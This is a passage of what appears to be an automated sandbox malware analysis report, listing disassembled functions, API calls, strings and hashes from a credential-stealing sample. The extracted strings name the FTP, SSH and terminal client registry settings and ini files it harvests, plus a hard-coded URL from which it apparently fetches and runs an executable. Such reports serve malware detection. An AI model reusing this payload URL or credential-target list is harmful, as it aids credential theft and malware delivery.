                                  • 756D19A0.OLE32(?,?,?,?,?,00000000,?,00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?,?,?), ref: 00402316
                                  • GlobalFix.KERNEL32(?), ref: 00402346
                                  • GlobalUnWire.KERNEL32(?), ref: 00402365
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$LocalWirelstrlen$AllocCloseEnumFreeOpen
                                  • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 3331298335-981893429
                                  • Opcode ID: 0b7ca07818f92d3c2a0da16dc09101e576ea349f56bb03f1b77b3079c04a7490
                                  • Instruction ID: e8800f7e17a62db29e95db71b44d800467aa85f06a3210c5d1cd602f7ee17b8c
                                  • Opcode Fuzzy Hash: 0b7ca07818f92d3c2a0da16dc09101e576ea349f56bb03f1b77b3079c04a7490
                                  • Instruction Fuzzy Hash: 54614A35900168BADF31AB61CD46FE97679EB44308F1040FAB588B11E1D7F89ED4AE68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 202 40fe88-40fe90 203 410061-410064 202->203 204 40fe96-40fe9e call 403d6d 202->204 206 40fea3-40fea5 204->206 207 40feab-40feb2 206->207 208 41004f-41005b 206->208 207->208 209 40feb8-40fed2 call 401788 207->209 208->203 208->204 212 40ff0b-40ff0e 209->212 213 40ff10-40ff3b call 4012bb call 401133 212->213 214 40fed4-40ff0a wsprintfA call 401e4c 212->214 221 40ff41-40ff4b 213->221 222 410039-41004a call 4018b8 call 401021 213->222 214->212 221->222 224 40ff51-40ff64 GetTempPathA 221->224 222->208 224->222 226 40ff6a-40ff6f 224->226 226->222 227 40ff75-40ffab GetTickCount wsprintfA CreateDirectoryA call 4025a9 226->227 231 40ffcd-40ffdb call 401df8 227->231 232 40ffad-40ffcb call 401df8 call 401e4c 227->232 236 40ffe0-40fff9 call 401463 231->236 232->236 241 40fffb-410029 lstrlen call 4026dd ShellExecuteA 236->241 242 41002e-410034 call 4018b8 236->242 241->242 242->222
                                  APIs
                                    • Part of subcall function 00401788: 756D19A0.OLE32(?,?), ref: 00401795
                                    • Part of subcall function 00401788: GlobalFix.KERNEL32(?), ref: 004017AC
                                    • Part of subcall function 00401788: GlobalUnWire.KERNEL32(?), ref: 004017C4
                                  • wsprintfA.USER32 ref: 0040FEEA
                                  • GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
                                  • GetTickCount.KERNEL32 ref: 0040FF75
                                  • wsprintfA.USER32 ref: 0040FF87
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
                                  • lstrlen.KERNEL32(true,?,?,?,?,00000000), ref: 00410000
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Globalwsprintf$CountCreateDirectoryExecutePathShellTempTickWirelstrcatlstrcpy
                                  • String ID: %02X$%d.exe$MZ$http://smartoffice-eg.com/include/rili/shit.exe$open$true
                                  • API String ID: 2046336982-1993330433
                                  • Opcode ID: b81741948bf32f7bbc7c5428ac9782d6634fcc18b13d4c29f815475df24daa5f
                                  • Instruction ID: 798d6633d1dddfa29f699b8c5659430589b66450ff5dd2e29decf7e633b954bc
                                  • Opcode Fuzzy Hash: b81741948bf32f7bbc7c5428ac9782d6634fcc18b13d4c29f815475df24daa5f
                                  • Instruction Fuzzy Hash: 93417B71900228AADB30AB61DC46FEEBBB99B05305F1005FBB548B11E1D6F84FC49F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 402 402c01-402c12 403 402c14 402->403 404 402c15-402c1d 402->404 405 402c31-402c35 404->405 406 402c1f-402c26 404->406 406->405 407 402c28-402c2f 406->407 407->405 408 402c36-402c4c GetCurrentProcess OpenProcessToken 407->408 409 402ce2-402ce6 408->409 410 402c52-402c6e GetTokenInformation 408->410 411 402c70-402c78 GetLastError 410->411 412 402cda-402cdd CloseHandle 410->412 411->412 413 402c7a-402c7e 411->413 412->409 413->412 414 402c80-402ca2 call 4018cf GetTokenInformation 413->414 417 402cd2-402cd5 call 4018b8 414->417 418 402ca4-402cb6 ConvertSidToStringSidA 414->418 417->412 418->417 419 402cb8-402cc7 lstrcmp 418->419 421 402cc9 419->421 422 402cca-402ccd LocalFree 419->422 421->422 422->417
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: S-1-5-18
                                  • API String ID: 0-4289277601
                                  • Opcode ID: db4d93788858fa455111b74aaf46cfe2d110fbcd533ae32d5aeae6627cc242d6
                                  • Instruction ID: d6a68a7a6fba872fbc8a204bfee8a5bac27731b7f04a2bc92072417478d2585c
                                  • Opcode Fuzzy Hash: db4d93788858fa455111b74aaf46cfe2d110fbcd533ae32d5aeae6627cc242d6
                                  • Instruction Fuzzy Hash: 69216230908209BFEF119BA0DD4ABEE7B79FB40305F104576A500B51E1D7F99A90DB1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 423 40668f-4066ac RegOpenKeyA 424 406911-406912 423->424 425 4066b2 423->425 426 4066b9-4066e0 RegEnumKeyExA 425->426 427 4066e2-40690c RegCloseKey 426->427 428 4066e7-4067a5 call 401df8 call 401e4c call 401d71 * 5 426->428 427->424 444 4067a7-4067ae 428->444 445 4067ba 428->445 444->445 446 4067b0-4067b8 444->446 447 4067c4-4067e9 call 4018b8 call 401d71 445->447 446->447 452 4067eb-4067f2 447->452 453 4067fe 447->453 452->453 454 4067f4-4067fc 452->454 455 406808-406815 call 4018b8 453->455 454->455 458 406856-40685d 455->458 459 406817-40681e 455->459 460 4068ca-406904 call 4018b8 * 5 458->460 461 40685f-406866 458->461 459->458 462 406820-406836 call 4043dc 459->462 460->426 461->460 465 406868-40686f 461->465 469 406841-40684c call 4018b8 462->469 470 406838-40683f 462->470 465->460 468 406871-4068c5 call 401569 call 4015cb * 2 call 40159f call 401569 call 4015cb 465->468 468->460 469->458 470->458 470->469
                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004066D9
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                                  • API String ID: 1332880857-4069465341
                                  • Opcode ID: f671b028d95d1c9e52c48c69483a4925051fe4183a6716c1044fdc532862c079
                                  • Instruction ID: ddbf5386c557692e0a2d872b86364cc9d1953b440620d6587ff0ea321d438c9c
                                  • Opcode Fuzzy Hash: f671b028d95d1c9e52c48c69483a4925051fe4183a6716c1044fdc532862c079
                                  • Instruction Fuzzy Hash: 9551E43194011CEADF217B51CC02BED7AB9BF44308F10C5BAA549750B1DB7A5BA5DF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 492 40d072-40d08c RegOpenKeyA 493 40d092 492->493 494 40d2c7-40d2c8 492->494 495 40d099-40d0c0 RegEnumKeyExA 493->495 496 40d0c2-40d2c2 RegCloseKey 495->496 497 40d0c7-40d15e call 401df8 * 2 call 4018b8 call 401d71 * 4 495->497 496->494 513 40d160-40d167 497->513 514 40d179-40d17b 497->514 513->514 515 40d169-40d177 call 4018b8 513->515 516 40d183 514->516 517 40d17d-40d17e call 4018b8 514->517 520 40d18d-40d1ca call 401d71 * 2 515->520 516->520 517->516 526 40d1d0-40d1e6 call 4043dc 520->526 527 40d264-40d2ba call 4018b8 * 5 call 40d072 call 4018b8 520->527 526->527 532 40d1e8-40d1ec 526->532 527->495 532->527 534 40d1ee-40d1f5 532->534 534->527 536 40d1f7-40d1fe 534->536 536->527 538 40d200-40d25f call 401569 call 4015cb * 2 call 40159f call 401569 call 4015cb * 2 536->538 538->527
                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0B9
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                                  • API String ID: 1332880857-2649023343
                                  • Opcode ID: 4228400375eb6ba1636e7165a495392a59199b0544f4799bd64617b774adfe0e
                                  • Instruction ID: 6c2faa976b9052ac72c52ca6464a050bd4b3273960fb2c20a586784dcbee0562
                                  • Opcode Fuzzy Hash: 4228400375eb6ba1636e7165a495392a59199b0544f4799bd64617b774adfe0e
                                  • Instruction Fuzzy Hash: 6251C831840218BADF216FA1CC02FDD7AB9BF04704F14C1BAB548750B1DB7A9B95AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 561 407bba-407bd4 RegOpenKeyA 562 407bda 561->562 563 407e1c-407e1d 561->563 564 407be1-407c08 RegEnumKeyExA 562->564 565 407c0a-407e17 RegCloseKey 564->565 566 407c0f-407cc2 call 401df8 * 2 call 4018b8 call 401d71 * 5 564->566 565->563 584 407cc4-407ccb 566->584 585 407cdd-407cdf 566->585 584->585 586 407ccd-407cdb call 4018b8 584->586 587 407ce1-407ce2 call 4018b8 585->587 588 407ce7 585->588 591 407cf1-407d18 call 401d71 586->591 587->588 588->591 595 407db9-407e0f call 4018b8 * 5 call 407bba call 4018b8 591->595 596 407d1e-407d25 591->596 595->564 596->595 597 407d2b-407d32 596->597 597->595 599 407d38-407d92 call 401569 call 4015cb * 3 call 401569 call 4015cb 597->599 625 407d94-407d9b 599->625 626 407daf-407db4 call 401569 599->626 625->626 627 407d9d-407dad call 401569 625->627 626->595 627->595
                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C01
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                                  • API String ID: 1332880857-3874328862
                                  • Opcode ID: 79abc041ff3e05102c83284989e97176fbb142bd313271e8f9441afae96d6fda
                                  • Instruction ID: 1780444ab987c72a7c0881d1e1f70479cbe17c78eae0564416758d360709c296
                                  • Opcode Fuzzy Hash: 79abc041ff3e05102c83284989e97176fbb142bd313271e8f9441afae96d6fda
                                  • Instruction Fuzzy Hash: 7051E131900118FADF226F61CC42BED7AB9BF04344F10C5BAB548750B1DB7A6A91AF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCA9
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                                  • API String ID: 1332880857-3620412361
                                  • Opcode ID: 24b59bc6cac35073b699ce53da4e9508f607e3939d1dda793b1a22a093ac594c
                                  • Instruction ID: 9e186bede9d82e05e6d3405ca47770cfa7b4b9f889abd471e1f7745202da50bf
                                  • Opcode Fuzzy Hash: 24b59bc6cac35073b699ce53da4e9508f607e3939d1dda793b1a22a093ac594c
                                  • Instruction Fuzzy Hash: 32519671850118AADF226F61CC42FDD7ABAFF04304F1085B6B548750B1DF7A9AA5AFC8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407F1F
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F53
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040811B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                                  • API String ID: 1332880857-2128033141
                                  • Opcode ID: 8155337dab849b2187ca4b56e93ff23d276ca655f7ffece577ee17086f02a680
                                  • Instruction ID: 5ab7ce4d41d7449111e2bf0245fe8bdc2d5e3158fb84ab1408711ceaad0d48f8
                                  • Opcode Fuzzy Hash: 8155337dab849b2187ca4b56e93ff23d276ca655f7ffece577ee17086f02a680
                                  • Instruction Fuzzy Hash: C4519431840118BADF226F51CD42FED7AB9BF04344F14C5BAB558740B1DB7A5B91AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 750 4026dd-4026ff RegCreateKeyA 751 402701-402718 RegSetValueExA 750->751 752 402723-402725 750->752 753 40271a 751->753 754 40271b-40271e RegCloseKey 751->754 755 4027f0-4027f4 752->755 756 40272b-40273e GetTempPathA 752->756 753->754 754->752 756->755 757 402744-402749 756->757 757->755 758 40274f-40276b CreateDirectoryA call 4025a9 757->758 761 402789-402793 call 401df8 758->761 762 40276d-402787 call 401df8 call 401e4c 758->762 766 402798-4027bc ExitProcess 761->766 762->766 768 4027d6-4027d8 766->768 769 4027be-4027d1 call 401422 CloseHandle 766->769 772 4027e5-4027eb call 4018b8 768->772 773 4027da-4027e0 DeleteFileA 768->773 769->768 772->755 773->772
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004026F8
                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402711
                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 0040271E
                                  • GetTempPathA.KERNEL32(00000104,?), ref: 00402737
                                  • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 00402758
                                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 004027B3
                                  • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 004027D1
                                  • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,?,?,?,00000000,00000104,?), ref: 004027E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                                  • String ID: Software\WinRAR
                                  • API String ID: 2428708885-224198155
                                  • Opcode ID: 54f15a5020ef37163a3c8c94c9dbf41e25b1ffd0d4d89cd0053ea5b90ecbae48
                                  • Instruction ID: 28b2972cc479343a501f6bdb5bbfbd3fa5c74dd95b9eafedc45f56a84fd52fee
                                  • Opcode Fuzzy Hash: 54f15a5020ef37163a3c8c94c9dbf41e25b1ffd0d4d89cd0053ea5b90ecbae48
                                  • Instruction Fuzzy Hash: 7621743194020DBBDF216FA0CD86FDD7A69AB14748F100076B214B61E1E6F99AD06B18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040506F
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414847,?,00000104,?), ref: 004050BF
                                  • GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414847,?,00000104,?), ref: 004050FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                  • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                  • API String ID: 2508676433-45949541
                                  • Opcode ID: b5beb5121603ee162935514c5fe7f9ea851b726c47e680cf08791f8b56fb377d
                                  • Instruction ID: 1ad5851406937463fc4fdd25d104d768d2af762f2f9e7c483ba0ad0795fe615e
                                  • Opcode Fuzzy Hash: b5beb5121603ee162935514c5fe7f9ea851b726c47e680cf08791f8b56fb377d
                                  • Instruction Fuzzy Hash: A8212671E80608BADB127A61CC43FDE3A299B54744F100077B758B51E3DBF99BD09A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA1C
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EA50
                                  • GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414847,?,00000104,00000000), ref: 0040EAD6
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EB2F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCloseEnumLocalOpenPrivateProfileString
                                  • String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
                                  • API String ID: 1343824468-2495907966
                                  • Opcode ID: 83f224f1632b9f4dce77d821230e8882deb379fc18da0ded7f5086493192e42a
                                  • Instruction ID: ac58ce0af485c97c10e38b57228944f3f3edc0c01af0d6674f8eb1bd57798e51
                                  • Opcode Fuzzy Hash: 83f224f1632b9f4dce77d821230e8882deb379fc18da0ded7f5086493192e42a
                                  • Instruction Fuzzy Hash: F1314A31940118BADF11BB91CC42FDD7ABAFF04704F10C4BAB554710E1DAB99AA1AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406413
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406447
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406655
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: Host$Port$PthR$SSH$User
                                  • API String ID: 1332880857-1643752846
                                  • Opcode ID: 5d413777307ef0352dc7a0c2de271fe84a847e6041c30ceef899dad6926243f8
                                  • Instruction ID: 7c2f2a94b444b1cf8be7c0a3922bf6908aa52d237082ff0e2c71ec8c1971a0d3
                                  • Opcode Fuzzy Hash: 5d413777307ef0352dc7a0c2de271fe84a847e6041c30ceef899dad6926243f8
                                  • Instruction Fuzzy Hash: 5751E43194011CFADF22AB51CC42BED7AB9BF44304F10C5BAB549750F1CB7A5AA1AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F96
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumFreeLocalOpen
                                  • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                  • API String ID: 3369285772-3748300950
                                  • Opcode ID: b11f4ac207976a8d98f79d6e3acf6612ba1676093035e5a7e8446c69af5bcd68
                                  • Instruction ID: 2d9a8220eb6bbd75a2f462893fd11e2b037df868adfd8f9c06f9ac5482d37282
                                  • Opcode Fuzzy Hash: b11f4ac207976a8d98f79d6e3acf6612ba1676093035e5a7e8446c69af5bcd68
                                  • Instruction Fuzzy Hash: 0841053194011CEADF216B61CC42FDD7AB9BF44304F10C5BAB545780F1CB7A5AA1AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071C3
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: Directory$Password$Server$UserName$_Password
                                  • API String ID: 1332880857-3317168126
                                  • Opcode ID: af89f026aee87d207881a99950fe3eed7aba238a4b2f7a5d48258be802f10cd6
                                  • Instruction ID: 54a0982324a7ff5f3bc78d2f041cd7ab304232967b033089dd6db8ff381706e5
                                  • Opcode Fuzzy Hash: af89f026aee87d207881a99950fe3eed7aba238a4b2f7a5d48258be802f10cd6
                                  • Instruction Fuzzy Hash: 3B41D33184011CBADF226F51CC42BDDBABABF04344F14C1BAB958741B1DB7A5B91AF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA41
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                  • API String ID: 1332880857-1017491782
                                  • Opcode ID: 0cd95adb243ede89800382dcb429f9e6c4945cf2143b8d229b94744e87d8264e
                                  • Instruction ID: 5f0e69666c37055548565fce8565ad50753ab55e3f11aef87143afabb8110fab
                                  • Opcode Fuzzy Hash: 0cd95adb243ede89800382dcb429f9e6c4945cf2143b8d229b94744e87d8264e
                                  • Instruction Fuzzy Hash: 8B41A471950118BADF226F51CC02FDD7ABAFF04344F1085BAB548750B1DF7A9AA1AF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073EE
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                  • API String ID: 1332880857-980612798
                                  • Opcode ID: 22d3f14d9f450ad54074f1152c9d6e68cb08287588104e834c763d9473088d75
                                  • Instruction ID: f08fa55c07ec5e6899d33725599ea259e95770034ce1eb7242ec538371f35ae2
                                  • Opcode Fuzzy Hash: 22d3f14d9f450ad54074f1152c9d6e68cb08287588104e834c763d9473088d75
                                  • Instruction Fuzzy Hash: CC41A33194011CBADF216F51CC42BDD7ABABF04344F14C1BAB958740B1DB7A5B91AF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040622E
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3
                                  Strings
                                  Memory Dump Source
